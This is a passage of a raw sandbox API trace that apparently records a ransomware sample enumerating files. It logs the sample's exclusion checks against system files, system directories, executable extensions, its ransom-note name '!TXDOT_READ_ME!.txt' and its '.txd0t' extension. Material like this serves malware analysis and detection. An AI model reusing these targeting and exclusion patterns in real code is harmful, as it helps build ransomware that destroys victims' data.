(psz1="SetupResources.dll", psz2=".") returned 1 [0071.408] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0071.408] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1040", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040") returned="C:\\588bce7c90097ed212\\1040" [0071.408] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1040", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040\\") returned="C:\\588bce7c90097ed212\\1040\\" [0071.408] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1040\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1040\\SetupResources.dll" [0071.408] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.408] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0071.408] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0071.408] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0071.408] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0071.408] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0071.408] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0071.408] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0071.408] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0071.408] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0071.408] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0071.408] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0071.408] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0071.408] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0071.408] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0071.408] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.408] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.408] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.408] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0071.408] FindClose (in: hFindFile=0xec2770 | out: hFindFile=0xec2770) returned 1 [0071.409] GetProcessHeap () returned 0xe30000 [0071.409] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec8320 | out: hHeap=0xe30000) returned 1 [0071.409] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1041", cAlternateFileName="")) returned 1 [0071.409] StrCmpW (psz1="1041", psz2=".") returned 1 [0071.409] StrCmpW (psz1="1041", psz2="..") returned 1 [0071.409] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.409] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.409] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1041", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1041") returned="C:\\588bce7c90097ed212\\1041" [0071.409] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\windows\\system32\\") returned 0x0 [0071.409] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\windows\\syswow64\\") returned 0x0 [0071.409] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\windows\\system\\") returned 0x0 [0071.409] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\windows\\winsxs\\") returned 0x0 [0071.409] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\appdata\\roaming\\") returned 0x0 [0071.409] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\appdata\\local\\") returned 0x0 [0071.409] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\appdata\\locallow\\") returned 0x0 [0071.409] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\all users\\microsoft\\") returned 0x0 [0071.409] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\inetpub\\logs\\") returned 0x0 [0071.409] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch=":\\boot\\") returned 0x0 [0071.409] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch=":\\perflogs\\") returned 0x0 [0071.409] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch=":\\programdata\\") returned 0x0 [0071.409] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch=":\\drivers\\") returned 0x0 [0071.410] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch=":\\wsus\\") returned 0x0 [0071.410] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch=":\\efstmpwp\\") returned 0x0 [0071.410] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch=":\\$recycle.bin\\") returned 0x0 [0071.410] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="crypt_detect") returned 0x0 [0071.410] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="cryptolocker") returned 0x0 [0071.410] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="ransomware") returned 0x0 [0071.410] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="C:\\WINDOWS") returned 0x0 [0071.410] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="C:\\Program Files (x86)") returned 0x0 [0071.410] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="C:\\Program Files") returned 0x0 [0071.410] GetProcessHeap () returned 0xe30000 [0071.410] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xec8320 [0071.410] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1041", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041") returned="C:\\588bce7c90097ed212\\1041" [0071.410] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1041", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041\\*") returned="C:\\588bce7c90097ed212\\1041\\*" [0071.410] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1041\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2470 [0071.411] StrCmpW (psz1=".", psz2=".") returned 0 [0071.411] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.411] StrCmpW (psz1="..", psz2=".") returned 1 [0071.411] StrCmpW (psz1="..", psz2="..") returned 0 [0071.411] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x278d, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0071.411] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0071.411] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0071.411] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1041", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041") returned="C:\\588bce7c90097ed212\\1041" [0071.411] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1041", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041\\") returned="C:\\588bce7c90097ed212\\1041\\" [0071.411] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1041\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned="C:\\588bce7c90097ed212\\1041\\eula.rtf" [0071.411] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.411] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0071.411] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0071.411] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0071.411] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0071.411] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0071.411] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0071.411] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0071.411] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0071.411] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0071.411] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0071.411] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0071.411] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0071.411] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0071.411] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0071.411] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.411] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.412] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0071.412] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.412] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.412] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.412] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.412] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.412] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.412] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x10a82, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0071.412] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0071.412] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0071.412] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1041", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041") returned="C:\\588bce7c90097ed212\\1041" [0071.412] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1041", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041\\") returned="C:\\588bce7c90097ed212\\1041\\" [0071.412] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1041\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" [0071.412] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.412] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0071.412] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0071.412] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0071.412] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0071.412] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0071.412] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0071.412] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0071.412] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0071.412] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0071.412] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0071.412] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0071.412] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0071.412] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0071.412] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0071.412] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.412] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.412] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0071.413] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.413] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.413] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.413] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.413] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.413] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.413] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0071.413] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0071.413] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0071.413] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1041", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041") returned="C:\\588bce7c90097ed212\\1041" [0071.413] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1041", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041\\") returned="C:\\588bce7c90097ed212\\1041\\" [0071.413] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1041\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1041\\SetupResources.dll" [0071.413] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.413] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0071.413] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0071.413] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0071.413] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0071.413] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0071.413] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0071.413] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0071.413] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0071.413] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0071.413] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0071.413] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0071.413] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0071.413] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0071.413] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0071.413] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.413] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.413] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.413] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0071.414] FindClose (in: hFindFile=0xec2470 | out: hFindFile=0xec2470) returned 1 [0071.414] GetProcessHeap () returned 0xe30000 [0071.414] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec8320 | out: hHeap=0xe30000) returned 1 [0071.414] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1042", cAlternateFileName="")) returned 1 [0071.414] StrCmpW (psz1="1042", psz2=".") returned 1 [0071.414] StrCmpW (psz1="1042", psz2="..") returned 1 [0071.414] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.414] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.414] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1042", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1042") returned="C:\\588bce7c90097ed212\\1042" [0071.414] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\windows\\system32\\") returned 0x0 [0071.414] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\windows\\syswow64\\") returned 0x0 [0071.414] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\windows\\system\\") returned 0x0 [0071.414] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\windows\\winsxs\\") returned 0x0 [0071.414] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\appdata\\roaming\\") returned 0x0 [0071.414] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\appdata\\local\\") returned 0x0 [0071.414] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\appdata\\locallow\\") returned 0x0 [0071.414] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\all users\\microsoft\\") returned 0x0 [0071.414] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\inetpub\\logs\\") returned 0x0 [0071.414] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch=":\\boot\\") returned 0x0 [0071.414] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch=":\\perflogs\\") returned 0x0 [0071.414] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch=":\\programdata\\") returned 0x0 [0071.414] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch=":\\drivers\\") returned 0x0 [0071.414] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch=":\\wsus\\") returned 0x0 [0071.414] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch=":\\efstmpwp\\") returned 0x0 [0071.414] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch=":\\$recycle.bin\\") returned 0x0 [0071.414] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="crypt_detect") returned 0x0 [0071.414] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="cryptolocker") returned 0x0 [0071.414] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="ransomware") returned 0x0 [0071.414] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="C:\\WINDOWS") returned 0x0 [0071.414] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="C:\\Program Files (x86)") returned 0x0 [0071.415] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="C:\\Program Files") returned 0x0 [0071.415] GetProcessHeap () returned 0xe30000 [0071.415] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xec8320 [0071.415] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1042", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042") returned="C:\\588bce7c90097ed212\\1042" [0071.415] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1042", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042\\*") returned="C:\\588bce7c90097ed212\\1042\\*" [0071.415] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1042\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec27f0 [0071.415] StrCmpW (psz1=".", psz2=".") returned 0 [0071.415] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.415] StrCmpW (psz1="..", psz2=".") returned 1 [0071.415] StrCmpW (psz1="..", psz2="..") returned 0 [0071.415] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x318f, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0071.415] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0071.415] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0071.415] 